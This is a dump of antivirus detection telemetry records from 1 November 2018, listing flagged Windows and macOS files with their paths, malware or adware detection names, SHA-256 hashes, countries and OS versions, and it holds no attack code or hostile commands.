  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:58:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142340-2fd0de92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb904b13\\AVSCAN-20181101-142242-2577798A\\AVSCAN-20181101-142340-2FD0DE92', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:23:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170819-cb4c800b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7cb21549\\AVSCAN-20181101-165012-79405224\\AVSCAN-20181101-170819-CB4C800B', filesize=2124000, name='TR/Graftor.141601.A.#M1.#R1'), hash='314e60701434e5398d5006c50cb0be7cd6f179184a4cd7ac0ce67e1b557ac659', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:08:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1989859\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\MX vs. ATV Untamed (USA)_0678088867.exe', parentsize=2575215, timestamp='2018-11-01T05:31:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105900-487c41f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105628-2D312540\\AVSCAN-20181101-105900-487C41F2', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155901-e055e772', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155901-E055E772', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c832ed6b008734995ebe31a3cf48e229e9d40a3cdeaf74e8e319c47e4f7a251c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C832ED6B008734995EBE31A3CF48E229E9D40A3CDEAF74E8E319C47E4F7A251C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c832ed6b008734995ebe31a3cf48e229e9d40a3cdeaf74e8e319c47e4f7a251c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:09:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsbFE42.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pcsws.exe', filepath='C:\\Program Files\\IBM\\Client Access\\Emulator\\pcsws.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c56bf9e4394213e64d50fb445064f70191378dd1f59b058d0bff581ac3c639a6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2633216, timestamp='2018-11-01T11:29:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141344-f86ac225', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0197bd9\\AVSCAN-20181101-140354-BD0DC590\\AVSCAN-20181101-141344-F86AC225', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:13:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader_632ae241.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader_632ae241.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ErnME\\\\\\/6G1kag\\\\\\/nF6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T10:32:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:55:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111718-2a8f99a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111718-2A8F99A4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110522-d027039d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110522-D027039D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7695db58a17aa32b3dd07463a56ea50078d361af3009b73794834bf53f13819a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\7695DB58A17AA32B3DD07463A56EA50078D361AF3009B73794834BF53F13819A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7695db58a17aa32b3dd07463a56ea50078d361af3009b73794834bf53f13819a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='92262830e7f41b539562360618383f088ee18fd34aeb94466223f5e8440d70ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\92262830E7F41B539562360618383F088EE18FD34AEB94466223F5E8440D70FF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='92262830e7f41b539562360618383f088ee18fd34aeb94466223f5e8440d70ff', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-085244-8ab79c8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181101-005657-94C4467B\\AVSCAN-20181101-085244-8AB79C8D', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:48:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130756-bec2f508', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-130734-AC9CA730\\AVSCAN-20181101-130756-BEC2F508', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:07:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:48:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\grosvenorcasinompp\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\grosvenorcasinompp\\mppoker.exe', parentsize=1214712, timestamp='2018-11-01T18:26:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:33:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='c68705e6e42a32e30b4f4f8c8c8fd77389ab87592342b137927303ee0e01172e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:02:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e9d6cdf12352556038062f1e4a4413c1df0abe4b4b51b2988f7870cafa81cc16', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:31:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='G:\\game\\Counter-Strike Xtreme V5\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='78fd1eca0c6136dbeef9a4709ca96133275851c7219a7fee4a101bccb72285ad', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1772072, timestamp='2018-11-01T04:40:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pconverter.0c994ca9ff0d4d9cadd24c677997c765.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.0c994ca9ff0d4d9cadd24c677997c765.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 8.3.2\\Start\\Start.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172706-d9ad476b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172706-D9AD476B', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='6b1d58b6b0eee00fcb53ff8618f245a6faf1f0a0a62765b632ff3ced53578544', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5816.25484\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5816.25484\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:27:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004309', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp00004309', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:39:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='music .exe', filepath='\\?\\J:\\العاب\\AirXonix1\\MUSIC\\MUSIC .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='15915f9ce6870b344d25d6d9f612fc29dbfb7df978055b375d52a7e54d11100b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='magicencoder.exe', filepath='D:\\Program Files\\Baofeng\\StormPlayer\\MagicEncoder.exe', filesize=1852000, name='W32/Sality.AT.#M1.#R1'), hash='1939402bcb82ab59ee4cc2ae623bf0016ab704081bdbfe7e81f5a9403c44564b', metadata=Row(cmdline='-Embedding', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Citrix\\ICA Client\\wfcrun32.exe', parentsize=1177912, timestamp='2018-11-01T12:06:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msg.exe', filepath='\\\\?\\F:\\Privat\\Projekte\\MSG\\MSG\\bin\\DesktopGL\\AnyCPU\\Release\\MSG.exe', filesize=576000, name='HEUR/APC.#M1.#R1'), hash='3bc74842f7bf8a04a15eb6f9fd12e7fd1cbf6dcf2ee3a7cfc49b389d3b75a577', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:14:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='5ac129140ae6dec501c55e50ffca4441d1a86582752c02c0da139498173cd395', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rebrp6p.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-3862479230-2305681621-2083271188-1000\\$REBRP6P.exe', filesize=284000, name='PUA/1ClickDownload.Gen.#M300.#R5544'), hash='350188a9922237521adfeea464dc39d8b1b35931baa3150a435f527fee61f230', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:42:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='patchmeup.exe', filepath='D:\\transit\\e-SPT\\Aplikasi e-SPT pph 21 versi 2.1  th.2014\\2. installer update espt 21 ver 2.1 ( jan2014)\\patchmeup.exe', filesize=64000, name='W32/Alman.BB.#M1.#R1'), hash='1dc9749daa80d83143d41d832dc9f057873eb96bbaaf3d17eb2d9a6b0cd48b4d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:19:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:59:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:29:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:17:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:55:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aamlauncher.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\UWA\\AAMLauncher.exe', filesize=524000, name='W32/Sality.AT.#M1.#R1'), hash='1f9a73633dd9f7c06e58cf7837f73fbf7bad50f5d7b3ed69559267f21f991c0f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=4014136, timestamp='2018-11-01T11:00:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:28:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5fb7ed1e268c301f8c510743bb7b8c756f25b9affcc4d1880f2a5b7f42b18884', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\5FB7ED1E268C301F8C510743BB7B8C756F25B9AFFCC4D1880F2A5B7F42B18884', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5fb7ed1e268c301f8c510743bb7b8c756f25b9affcc4d1880f2a5b7f42b18884', metadata=Row(cmdline='-r', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T11:54:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:58:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='46a5d04eae4c913cb86e4486dd015feed077ea2786aa209503d1cd6275579461', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\46A5D04EAE4C913CB86E4486DD015FEED077EA2786AA209503D1CD6275579461', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='46a5d04eae4c913cb86e4486dd015feed077ea2786aa209503d1cd6275579461', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:24:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:23:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0125904.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0125904.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:43:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:02:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:20:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173302-35319f12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9a56be1\\AVSCAN-20181101-173240-310FC958\\AVSCAN-20181101-173302-35319F12', filesize=1920000, name='TR/Hesv.rfwaf.#M1.#R1'), hash='39f6946c1a066b1cbde5f405ec3c9b9221fdd5c30ca0fb763d6876c803c1f71c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:33:01Z'), dt=datetime.date(2018, 11, 1)),
